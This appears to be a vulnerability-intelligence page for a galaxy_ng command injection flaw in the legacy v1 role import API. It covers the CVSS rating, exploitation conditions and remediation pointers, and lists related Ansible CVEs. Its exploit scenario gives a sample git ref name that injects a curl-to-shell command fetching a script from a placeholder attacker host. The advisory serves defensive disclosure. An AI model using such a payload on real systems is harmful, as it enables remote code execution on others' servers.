Severity by source
AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Network-reachable API (AV:N) but requires non-default GALAXY_ENABLE_LEGACY_ROLES and attacker-controlled git ref (AC:H); needs an authenticated account (PR:L); RCE on pulp worker yields full C/I/A impact.
Primary rating from Vendor (redhat).
CVSS VectorVendor: redhat
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
1DescriptionCVE.org
A command injection vulnerability was found in galaxy_ng. The do_git_checkout() function in the legacy role import API (v1) interpolates unsanitized git ref names (branch/tag names) into shell commands executed via subprocess.run() with shell=True. An authenticated user who controls a git repository can create a branch or tag with shell metacharacters in the name to achieve remote code execution on the pulp worker. The vulnerable endpoint is only reachable when GALAXY_ENABLE_LEGACY_ROLES is set to True, which is not the default configuration.
AnalysisAI
Remote code execution in galaxy_ng's legacy role import API (v1) allows an authenticated user controlling a git repository to execute arbitrary commands on the pulp worker by crafting a branch or tag name containing shell metacharacters. The flaw stems from unsanitized git ref interpolation into a subprocess.run() call with shell=True inside do_git_checkout(), and only affects deployments where GALAXY_ENABLE_LEGACY_ROLES is explicitly enabled (non-default). …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires four concrete conditions, all derivable from the description and CVSS vector: (1) the target galaxy_ng deployment must have the setting GALAXY_ENABLE_LEGACY_ROLES=True, which is explicitly not the default; (2) the attacker must hold a low-privileged authenticated account on the Galaxy API (CVSS PR:L) able to call the legacy v1 role import endpoint; (3) the attacker must control a git repository reachable by the pulp worker so they can create a branch or tag whose name contains shell metacharacters; and (4) the malicious ref name must survive transport to do_git_checkout() and be passed into subprocess.run(..., shell=True). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The signals point to a real but conditional risk rather than a mass-exploitation issue. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker registers a low-privileged account on a galaxy_ng instance where GALAXY_ENABLE_LEGACY_ROLES is enabled, then publishes a git repository (e.g., on GitHub) containing a branch or tag named something like `v1.0;curl attacker.tld/s|sh;#`. They submit that repository through the legacy v1 role import API; the pulp worker invokes do_git_checkout(), which interpolates the ref into a shell command, and the injected payload executes on the worker as the pulp service user. … |
| Remediation | Patch availability is not stated explicitly in the supplied data, so treat this as 'Patch available per vendor advisory' and consult https://access.redhat.com/security/cve/CVE-2026-12398 and https://bugzilla.redhat.com/show_bug.cgi?id=2489180 for the exact fixed galaxy_ng / Ansible Automation Platform 2 builds. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: identify all galaxy_ng deployments with GALAXY_ENABLE_LEGACY_ROLES enabled and assess operational criticality. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Credential disclosure in Red Hat Ansible Automation Platform 2.5 and 2.6 allows any authenticated user to retrieve plain
mTLS authentication bypass in the Red Hat Ansible Automation Platform (AAP) Gateway Envoy proxy allows unauthenticated r
Container privilege escalation in Red Hat Ansible Automation Platform 2 allows non-root users within affected container
Server-Side Request Forgery in AWX's GitHub webhook integration (Red Hat Ansible Automation Platform 2) enables a remote
Insufficient OAuth token invalidation in Ansible Lightspeed (part of Red Hat Ansible Automation Platform 2.x) allows a r
Path traversal in awxkit's YAML !include directive exposes arbitrary local files when a user imports a crafted YAML file
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-37124
GHSA-6hw7-j4jw-wpff